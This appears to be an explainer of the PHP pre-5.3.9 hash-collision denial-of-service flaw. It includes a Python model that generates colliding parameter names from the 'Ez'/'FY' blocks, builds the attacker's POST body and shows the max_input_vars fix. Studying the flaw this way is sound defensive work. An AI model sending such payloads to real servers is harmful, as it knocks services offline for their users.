PHP before 5.3.9 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
PHP versions prior to 5.3.9 are vulnerable to a denial-of-service (DoS) attack. Every request parameter name is inserted into a PHP array, and the Zend hash table behind every PHP array uses a public, unkeyed hash function (DJBX33A), so an attacker can precompute thousands of distinct parameter names that all land in the same bucket. Parsing such a request costs CPU time that grows quadratically with the number of parameters, and a few concurrent requests can leave a web application unresponsive.
Step 1: Payload Preparation: The attacker generates a large set of distinct parameter names whose full DJBX33A hash values are identical (not merely equal modulo the current table size, so growing the table never separates them) and places them in one HTTP request, typically a POST body of a few hundred kilobytes.
Step 2: Request Submission: The attacker sends the crafted request to any URL served by a vulnerable PHP build. The targeted script does not need to read the parameters, because PHP populates $_GET, $_POST and $_REQUEST before the script runs (for POST bodies, whenever the Content-Type is one PHP parses, such as application/x-www-form-urlencoded or multipart/form-data).
Step 3: Parameter Processing: As PHP builds the superglobal arrays, each new name hashes into the same bucket and is compared against every name already in that bucket's chain before it can be appended. For n parameters this is roughly n^2/2 string comparisons instead of the n cheap inserts a well-distributed request would cost.
Step 4: Resource Exhaustion: The CPU time of the PHP process or worker is consumed by those comparisons for the lifetime of the request. A handful of such requests in parallel ties up every worker in the pool, so the server stops answering legitimate requests.
The vulnerability stems from the hash function used by the Zend engine's hash table, which backs every PHP array and therefore the $_POST, $_GET, $_REQUEST and $_COOKIE superglobals that are filled from attacker-controlled names. That function, DJBX33A (h = h*33 + byte, starting from 5381), is unkeyed and trivially invertible, so an attacker can precompute an arbitrary number of distinct strings with the same hash value; for example, the two-byte blocks "Ez" and "FY" hash identically, and any concatenation of n such blocks yields 2^n colliding keys. The table resolves collisions by chaining, so every insert into an over-full bucket walks the whole chain comparing keys, giving O(n^2) work in the worst case. The predictability of the hash is the root cause; chaining is an ordinary collision strategy that only becomes a problem because collisions can be forced at will. PHP 5.3.9 did not change the hash function; it added the max_input_vars directive (default 1000), which caps the number of input variables accepted per request and emits a warning when the cap is exceeded, limiting n and with it the quadratic cost. The same class of problem was reported against several other language runtimes at the same time (oCERT advisory 2011-003).
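The following Python model, added here as an illustration and not taken from PHP's source, ties the four steps above to the root cause: it implements DJBX33A, derives 2^n colliding parameter names from the "Ez"/"FY" block pair, counts the key comparisons a Zend-style chained table performs while inserting them next to the same count for ordinary names, builds the attacker's form body, and applies the max_input_vars cap introduced in 5.3.9. Assumed for the model: a 32-bit hash width, an 8-bucket initial table that doubles once it holds more keys than buckets, and the default limit of 1000 variables; all key sets are constructed in the block.

```python
"""Model of CVE-2011-4885: DJBX33A collisions vs. a chained hash table.

Added example, not PHP's own code. Assumptions: 32-bit hash, 8 initial
buckets doubling when full, max_input_vars default of 1000.
"""
from itertools import product
from urllib.parse import urlencode

MASK32 = 0xFFFFFFFF


def djbx33a(key: str) -> int:
    """Zend's string hash: h = h*33 + byte, seeded with 5381.

    Truncated to 32 bits here (assumption); a 64-bit build keeps more bits,
    but the equal-length collisions below hold at any width. Zend also
    hashes the key's trailing NUL; appending the same byte to every key
    preserves the collision, so it is omitted from the model.
    """
    h = 5381
    for byte in key.encode("latin-1"):
        h = (h * 33 + byte) & MASK32
    return h


# "Ez" and "FY" collide: 69*33 + 122 == 70*33 + 89 == 2399. Each block maps
# h -> 1089*h + 2399 regardless of which one is used, so any string made of
# n blocks has the same hash, giving 2**n distinct colliding names.
COLLIDING_BLOCKS = ("Ez", "FY")


def gen_colliding_keys(n_blocks: int) -> list:
    """Step 1: every concatenation of n_blocks blocks, all with one hash."""
    return ["".join(b) for b in product(COLLIDING_BLOCKS, repeat=n_blocks)]


def chain_comparisons(keys, initial_buckets: int = 8) -> int:
    """Step 3: insert keys into a Zend-style chained table and count the key
    comparisons made while walking bucket chains before each append.

    bucket = hash & (size - 1); the table doubles once it holds more keys
    than buckets. Keys with identical full hashes always share a bucket, so
    resizing never shortens their chain.
    """
    size = initial_buckets
    buckets = [[] for _ in range(size)]
    count = 0
    comparisons = 0
    for key in keys:
        chain = buckets[djbx33a(key) & (size - 1)]
        for existing in chain:
            comparisons += 1
            if existing == key:  # duplicate name overwrites; no growth
                break
        else:
            chain.append(key)
            count += 1
            if count > size:  # grow and relink; Zend relinks without key compares
                size *= 2
                grown = [[] for _ in range(size)]
                for bucket in buckets:
                    for k in bucket:
                        grown[djbx33a(k) & (size - 1)].append(k)
                buckets = grown
    return comparisons


def build_post_body(keys) -> str:
    """Steps 1-2: the attacker's application/x-www-form-urlencoded body."""
    return urlencode([(k, "1") for k in keys])


def within_input_limit(body: str, max_input_vars: int = 1000) -> bool:
    """The 5.3.9 mitigation: count top-level variables before inserting them
    and refuse (with a warning in real PHP) anything past max_input_vars."""
    n_vars = sum(1 for part in body.split("&") if part)
    return n_vars <= max_input_vars


if __name__ == "__main__":
    evil = gen_colliding_keys(8)  # 256 names, one hash value
    benign = ["p%d" % i for i in range(256)]  # constructed ordinary names
    print("colliding:", chain_comparisons(evil), "comparisons")
    print("benign:   ", chain_comparisons(benign), "comparisons")
    print("1024 vars accepted by 5.3.9 default?",
          within_input_limit(build_post_body(gen_colliding_keys(10))))
```

With 256 colliding names the model performs 256*255/2 = 32640 comparisons, exactly the triangular number the "n^2/2" estimate predicts, while 256 ordinary names cost a small fraction of that because the table keeps them spread out as it grows. Doubling the block count to 10 yields 1024 names, already over the default max_input_vars, which is why the cap blunts the attack without touching the hash function.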